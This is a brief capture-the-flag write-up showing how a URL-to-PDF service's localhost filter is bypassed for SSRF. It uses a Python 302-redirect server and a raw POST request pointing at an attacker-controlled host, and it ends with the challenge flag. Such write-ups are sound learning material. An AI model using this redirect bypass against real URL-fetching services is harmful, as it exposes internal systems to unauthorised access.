Rating:
This challenge involved a website that allowed users to specify a URL to render as a PDF. This
essential acts as a way to perform SSRF. However, any address such as `127.0.0.1` or other encoded
forms are rejected.
To get around this, we simply use redirect headers on our own server. I simply reused this [code snippet](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery#bypass-via-redirect):
```python
#!/usr/bin/env python3
#python3 ./redirector.py 8000 http://127.0.0.1/
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler
if len(sys.argv)-1 != 2:
print("Usage: {} <port_number> <url>".format(sys.argv[0]))
sys.exit()
class Redirect(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', sys.argv[2])
self.end_headers()
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
```
This was invoked with `python redirector.py 80 http://127.0.0.1`.
The following request was sent to the challenge server to trigger the redirect to localhost.
```
POST /convert HTTP/1.1
Host: 143.244.132.186:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://143.244.132.186:3000
Connection: close
Referer: http://143.244.132.186:3000/
Upgrade-Insecure-Requests: 1
target=http://attacker.sg.pwn
```
The resultant PDF document that gets rendered contains:
```
Welcome back to home admin! Here is your Flag: VULNCON{W3lc0me_b4ck_t0_h0m3}
```
**Flag:** `VULNCON{W3lc0me_b4ck_t0_h0m3}`
